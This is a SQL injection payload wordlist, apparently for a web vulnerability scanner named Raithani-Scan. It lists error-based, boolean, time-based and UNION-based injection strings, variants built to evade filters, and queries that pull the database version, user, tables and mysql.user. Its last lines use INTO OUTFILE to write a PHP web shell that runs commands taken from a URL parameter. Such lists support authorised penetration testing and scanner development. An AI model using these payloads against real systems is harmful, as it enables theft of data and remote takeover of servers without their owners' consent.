# SQL Injection Payloads - Raithani-Scan
# ========================================
# Error Based
' 
"
')
")
'))
"))
\"
%27
%22
%29
' OR '1'='1
" OR "1"="1
' OR '1'='1'--
" OR "1"="1"--
' OR '1'='1'#
' OR '1'='1'/*
' OR 1=1--
" OR 1=1--
OR 1=1--
' OR '1'='1'--
' OR '1'='1'-- -
' OR 1=1-- -
OR '1'='1'
OR 1=1
' AND '1'='1
' AND '1'='2
' AND 1=1--
' AND 1=2--
AND 1=1
AND 1=2
' AND 1=1 AND '1'='1
' AND 1=2 AND '1'='1
' AND SLEEP(5)--
' AND SLEEP(5) AND '1'='1
' OR SLEEP(5)--
' OR SLEEP(5) OR '1'='1
' AND BENCHMARK(5000000,MD5(1))--
' OR BENCHMARK(5000000,MD5(1))--
' WAITFOR DELAY '0:0:5'--
' WAITFOR DELAY '0:0:5'--
" WAITFOR DELAY '0:0:5'--
'; WAITFOR DELAY '0:0:5'--
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT 1,2,3--
' UNION SELECT 1,2,3,4--
' UNION SELECT 1,2,3,4,5--
' UNION SELECT 1,2,3,4,5,6--
' UNION SELECT 1,2,3,4,5,6,7--
' UNION SELECT 1,2,3,4,5,6,7,8--
' UNION SELECT 1,2,3,4,5,6,7,8,9--
' UNION SELECT 1,2,3,4,5,6,7,8,9,10--
' UNION ALL SELECT NULL--
' UNION ALL SELECT NULL,NULL--
' UNION ALL SELECT NULL,NULL,NULL--
' UNION ALL SELECT 1,2,3--
' UNION ALL SELECT 1,2,3,4--
' UNION ALL SELECT 1,2,3,4,5--
UNION SELECT 1,2,3--
UNION ALL SELECT 1,2,3--
' UNION SELECT @@version--
' UNION SELECT database()--
' UNION SELECT user()--
' UNION SELECT version()--
' UNION SELECT table_name FROM information_schema.tables--
' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version())))--
' AND UPDATEXML(1,CONCAT(0x7e,(SELECT version())),1)--
' AND 1=CAST((SELECT @@version) AS int)--
' AND RAND(0)>SLEEP(5)--
' AND 1=0 UNION SELECT 1,2,3--
' AND 1=0 UNION ALL SELECT 1,2,3--
' AND 1=1 UNION SELECT 1,2,3--
' AND 1=0 UNION SELECT null,null,null--
' OR 1=0 UNION SELECT 1,2,3--
' OR 1=1 INTO OUTFILE '/tmp/out.txt'--
' OR '1'='1' ORDER BY 1--
' OR '1'='1' ORDER BY 2--
' OR '1'='1' ORDER BY 3--
' OR '1'='1' ORDER BY 4--
' OR '1'='1' ORDER BY 5--
' OR '1'='1' ORDER BY 6--
' OR '1'='1' ORDER BY 7--
' OR '1'='1' ORDER BY 8--
' OR '1'='1' ORDER BY 9--
' OR '1'='1' ORDER BY 10--
' HAVING 1=1--
' GROUP BY 1 HAVING 1=1--
' GROUP BY 1,2 HAVING 1=1--
' GROUP BY 1,2,3 HAVING 1=1--
' AND 1=1 GROUP BY 1,2,3 HAVING 1=1--
' AND 1=2 GROUP BY 1,2,3 HAVING 1=1--
%27%20UNION%20SELECT%20%40%40version--
%2527%2520UNION%2520SELECT%2520%2540%2540version--
' UNION SELECT 0x313233,0x313233--
' UNION SELECT CHAR(49),CHAR(50)--
' UNION SELECT CONVERT(1 USING latin1)--
' UNION SELECT CAST(1 AS CHAR)--
/*!UNION*/ /*!SELECT*/ 1,2,3--
'+UNION+SELECT+1,2,3--
'||UNION SELECT 1,2,3||'
' UNION /**/ SELECT 1,2,3--
' UNION/**/SELECT/**/1,2,3--
'/*!UNION*//*!SELECT*/1,2,3--
' UNION SELECT 1,2,3 FROM mysql.user--
' UNION SELECT 1,2,3 FROM dual--
' UNION SELECT 1,2,3 FROM (SELECT 1) a JOIN (SELECT 2) b--
' UN/**/ION SEL/**/ECT 1,2,3--
'/**/UNION/**/SELECT/**/1,/**/2,/**/3--
' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL--
' UNION DISTINCT SELECT 1,2,3--
' ORDER BY 1-- 
' ORDER BY 100--
' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
' UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c--
' PROCEDURE ANALYSE()--
' INTO DUMPFILE '/tmp/test'--
' INTO OUTFILE '/var/www/html/shell.php' LINES TERMINATED BY 0x3c3f7068702073797374656d28245f4745545b2763275d293b3f3e--
' INTO OUTFILE '/var/www/html/shell.php' FIELDS TERMINATED BY '<?php system($_GET['c']);?>'--
